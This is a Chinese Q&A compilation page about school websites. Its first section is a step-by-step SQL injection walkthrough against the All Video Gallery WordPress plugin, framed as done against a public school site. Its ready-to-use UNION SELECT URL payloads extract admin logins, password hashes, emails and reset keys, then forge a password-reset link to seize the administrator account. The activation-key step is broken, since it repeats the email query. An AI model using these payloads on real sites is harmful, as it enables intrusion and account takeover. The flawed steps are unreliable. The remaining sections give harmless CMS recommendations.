導航:首頁 > 文件教程 > Wordpress學校網站

Wordpress學校網站

發布時間:2023-06-30 04:50:34

A. 如何利用SQL注入漏洞攻破一個wordPress網站

SQL注入的基本原理

sql注入成因主要是對頁面參數沒有進行非法字元校驗導致,比如說一個訂單頁面要顯示某個客戶的所有訂單列表,這個頁面的地址可能是http://xxx.com/list.php?customID=3,我們推理,這樣頁面的後台處理的sql應該是這樣的:

select * form custom_order where custom_id = {$_GET['customID']}

按正常情況下,這里的接收的參數{$_GET['customID']}的值應該是傳入的值3,這樣頁面就能正確的把所有客戶ID等於3的訂單信息顯示到頁面上。但是,如果這個參數被人惡意改成了如下形式:

http://xxx.com/list.php?customID=-1 union select 1,2,3,user,5,passwd,7,8,9,10 from admin

按這樣的參數拼裝成的sql就成了這樣:

select * form custom_order where custom_id = -1 union select 1,2,3,user,5,passwd,7,8,9,10 from admin

這樣注入惡意sql後,訂單列表頁顯示的就不是訂單信息了,而是資料庫中用戶的名稱和密碼,或者任意其它想要的信息。下面我們就按照這個原理來一步一步的獲取這個公立學校網站的管理員用戶名,管理員郵箱地址,通過郵箱重置管理員密碼,登錄超級管理員後台。

All Video Gallery插件的漏洞簡介

安裝了All Video Gallery插件的Wordpress博客里會有這樣的一個地址:

http://xxx.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11

訪問這個頁面會顯示一些配置信息,問題就出在pid這個參數上,程序後台顯然沒有嚴格檢查這個參數,我們將利用這個參數進行sql注入。

WordPress是一個開源的平台,我們很容易弄清楚用戶表的表名是wp_users,存放用戶名,密碼,郵件地址的欄位分別是user_login,user_pass,user_email,我們下面將要把用戶信息表注入進去。

獲取超級管理員用戶名

為了獲取用戶表中的用戶名,我們注入的sql是這樣的:

http://xxx.com/wp-content/plugins/all-video-gallery/config.php?vid=11&pid=1&pid=-1
union select
1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
from wp_users

在瀏覽器里輸入上面的地址,頁面上會顯示下面的信息:

獲取超級管理員郵件地址

我們可以直接獲取用戶的密碼,但很顯然,密碼都是加密的,無法使用,我們這里使用另外一種思路,先獲取用戶的郵件地址,然後使用這個郵件重置用戶的密碼。

要獲取郵件地址,我們需要將上面的sql中的欄位名改成user_email:

http://xxx.com/wp-content/plugins/all-video-gallery/config.php?vid=11&pid=1&pid=-1
union select
1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
from wp_users

在瀏覽器里輸入上面的地址,頁面上會顯示下面的信息:

重置管理員密碼

WordPress的後台登陸地址是http://xxx.com/wp-login.php,這個地址是可以公共訪問的,我們進入這個頁面後,點擊Lost your password?鏈接,輸入上面獲取的管理員郵件。

這樣做了之後,Wordpress會向這個郵件地址發送一封含有激活碼的密碼重置地址。我們無法登陸這個郵箱獲取這個地址,但我們可以使用上面同樣
的方法獲取這個激活碼,自己拼裝出密碼重置地址。存放激活碼的欄位是user_activation_key,我們的sql注入地址改成下面這樣:

http://xxx.com/wp-content/plugins/all-video-gallery/config.php?vid=11&pid=1&pid=-1
union select
1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
from wp_users

在瀏覽器里輸入上面的地址,頁面上會顯示下面的信息:

有了激活碼,我們就可以拼裝出裝置密碼的地址了:

http://xxx.com/wp-login.php?action=rp&key=resetkey&login=username

利用這個地址進入重置密碼頁面:

總結

我們的黑客行動到此基本上是大功告成,但事實上我並沒有去執行最後一步。本文的目的不是要告訴人們如何進行黑客攻擊,而是要提醒大家防範安全漏洞,
所謂知己知彼,方能百戰不殆,程序員應當對基本的黑客攻擊方式有一些了解,針對性的在編程時避免造成類似sql注入的安全漏洞,構築更健壯的軟體。

B. 求一個關於學校的Html+Css的靜態網站源碼

直接去下載網站系統來做,適合做學校的比如pageadmin系統、wordpress系統這些都可以。

C. 一個學校網站應該包含哪些欄目

一般的網站後台都可以自己增加欄目的,你網站難道沒有後台嗎?

你可以去下載專業網站管理系統來用算了,
比如pageadmin系統、wordpress系統、shopex系統這些都很好用

D. 網站建設的步驟有哪些

E. 教育類網站國微cms和帝國cms哪個更好一些

帝國CMS
非常老牌的CMS,就如同該CMS官網介紹的安全、強大、穩定、靈活。
安全性:高,姜就是老的辣,老牌的CMS就是靠譜,安全性四顆星★★★★☆。
模板豐富度:帝國CMS的模板與程序分離,在二次開發與模板設計上非常靈活,這樣就決定著要對PHP有一點了解,標簽的參數較為復雜,網路上的資源較為豐富,但是模板的導入導出功能對新手不太友好,同時擴展庫也較為豐富,三顆星★★★☆☆。
上手簡易度:帝國CMS後台設置參數較多,所有信息皆存儲在資料庫中,功能搭配上較為嚴謹,對新手來說需要一定的學習成本,三顆星★★★☆☆。
國微CMS
國微CMS為國內最主流的CMS系統之一,也是中國南方PHP領域最大的開源平台提供商。現擁有平台注冊用戶超過23萬,下載次數達到70餘萬次,主要面向政府、軍隊、學校、集團級客戶。耕耘八年,國微CMS採用二代框架,在系統高性能、速度、模塊化、體系化、可視化等方面極具核心競爭優勢, 可確保客戶運營成功。
網路轉載!

閱讀全文

與Wordpress學校網站相關的資料

熱點內容
ps修改有褶皺的文件 瀏覽:417
javadbfreader 瀏覽:307
蘋果手機數字代碼是什麼 瀏覽:66
驅動程序順序安裝腳本 瀏覽:665
word文件里怎樣查重 瀏覽:219
mx5系統基帶版本 瀏覽:184
ntlea全域通win10 瀏覽:171
qq怎麼查看別人的收藏 瀏覽:135
地震三參數matlab程序 瀏覽:57
怎樣給優盤文件加密軟體 瀏覽:7
收拾文件有哪些小妙招 瀏覽:431
pdf文件去底網 瀏覽:253
win10重裝系統需要格式化c盤嗎 瀏覽:424
路由器trx文件 瀏覽:655
淘寶店鋪數據包怎麼做 瀏覽:195
win10鍵盤黏連 瀏覽:332
json如何生成表格 瀏覽:323
怎麼修復sql資料庫表 瀏覽:40
微信微博差別 瀏覽:163
簽到積分換禮品app 瀏覽:812

友情鏈接